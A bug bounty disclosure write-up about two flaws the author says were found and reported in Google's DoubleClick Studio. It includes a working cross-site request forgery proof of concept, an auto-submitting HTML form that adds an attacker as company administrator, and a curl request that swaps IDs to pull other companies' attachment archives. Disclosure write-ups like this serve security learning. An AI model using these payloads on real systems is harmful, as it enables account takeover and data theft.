I always wanted to take up a challenge and hit the very well known companies security, this time I’ve chosen Google !
Taking up that very big company from an individual hacker side is a hard take up, it has many acquisitions, services, products …etc and choosing where to start is a time and efforts consuming too, then I thought why don’t we take the challenge to a higher level
Double-click studio and motivation :
Google have an advertisement product which is known as “Double click studio”, Double click studio is made to manage and organize the workflow of Google’s DoubleClick Digital Marketing, With double click studio you can easily manage the workflow of data that produced across Google Ads, Microsoft Advertisement Center and Yahoo Marketing platform.
The studio is made within Google main domain “google.com/doubleclick/studio/“ as it is very important product, and that’s enough to touch the curiosity cells and start to discover the unwanted stuff,
What could possibly go wrong :
In the dashboard a user on the company that he’s running ads for it he can create advertisements and it’s campaigns and they can invite other users with specific privileges to access these ads and campaigns on the platform,
I instantly started the proxy tool (burp suite) and I started to sniff the requests and responses on that platform, doing some of efforts I ended up finding :
A hacker can make himself an administrator of any company on the platform ($3133.7 bounty) and more:
The requests that were given by the users side were not checked wether they were supplied from an external website or not, meaning an external website (attacker.dz) can make a cross requests to that platform on behalf any user and allowing him to make actions on his behalf, this is well known for XSRF attacks (cross site request forgery), so I started to see if it’s really existing !
The request to add users was like :
POST /doubleclick/studio/service HTTP/2
Host : google.com
Content-Type: application/json
{"service":"AdvertiserService","method":"create","arguments":["{\"accountId\":60021129,\"name\":\"Adam Test\",\"emailParams\":{\"to\":[\"AAAA\"],\"cc\":[\"the new user email\"],\"message\":\"AAAAAA' value='AAAAAAA\"}}"]}
plus some other headers ofc, taking it a bit deeper, the backend was expecting a json object with the required params,
meaning a cross origin requests can not send content-type as application/json cross origins, except if the CORS rule approves, there was not CORS misconfiguration on the platform, but the question is that “it checks if the request content type is json or not” ?
And yes it wasn’t, meaning that we can send a request with any content type and the backend won’t check it out, which leaves the platform in a vulnerable state, as if we craft a request with the required JSON parameters and the content type is anything the request will be acceptable, doing so that can make the org owner add arbitrary user by just opening a website, proof of concept :
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<form action="https://www.google.com/doubleclick/studio/service" method="post" enctype="text/plain"> <input name='{"service":"AdvertiserService","method":"create","arguments":["{\"accountId\":60021129,\"name\":\"Adam Tesst\",\"emailParams\":{\"to\":[\"AAAA\"],\"cc\":[\"attacker email\"],\"message\":\"AAAAAA' value='AAAAAAA\"}}"]}' type="text"> <input type="submit"> </form>
<script> $(document).ready(function(){ $("#frm1").submit(); });</script>
implimeting this HTML/JS code in attacker website, once the victim opens the link the attacker will instantly be invited as administrator to that company, and he will late be able to :
-
access the ads and campaigns data (read/write access)
-
access users and their data (read/write)
-
access the company assets (read/write)
Also the other requests were in a vulnerable state means an attacker was also able to preform any other actions without inviting himself (such as adding ads, deleting …etc) so the XSRF was massively effecting the whole product
Google Immediately accepted the bug and it assessed it as P1 (1st priority issue)
Within a couple of weeks they rewarded me a bounty of $3133.7 (stands for ELITE)
Authorization issue allowed to access sensitive files of other companies (duplicated) :
Looking further into the platform, I noticed that it processes many organizations, users, projects, campaigns …etc, sniffing the requests to see how it manages them, the backend takes the ID parameter of every request and make a direct edit for it, this came to mind that there must be a kind of entanglements on the design, so at the time I made another account and I started playing around with IDs, as example I edit the campaign of accountA from accountB and so on
At some point I found that the backend wasn’t really checking for authorization on the feature of “downloading users attachments”, The platform allows its users to download their campaigns data as ZIP file which contains the images, PDF files, documents that were uploaded in the campaign, and that allowed for attackers to access other companies attachment that held sensitive content, this can be done by just a curl request :
curl --data '{"service":"CreativeService","method":"getDownloadArchiveUrl","arguments":["60105989","61744772"]}' -XPOST https://www.google.com/doubleclick/studio/service -H "Content-Type:text/plain"
as attacker you just have to change the arguments parameter array to the victim’s campaign and the server will immediately gives back the ZIP file location
the report was sent, but it was already reported by other researcher
At that point I just unlocked a new achievement which is “Hack a Google product” and really was interesting experience to me, at that time my current ranking among the Google hackers was the 251st, and it current went back to 468th place as I wasn’t active for over a year
see the link of my profile :
That’s it for now,
Thanks for the time you’ve taken into this report and I hope that you have enjoyed reading it and discovered something new !
Credit to Aymen BenMalek and Sohaib Naceri for their assistance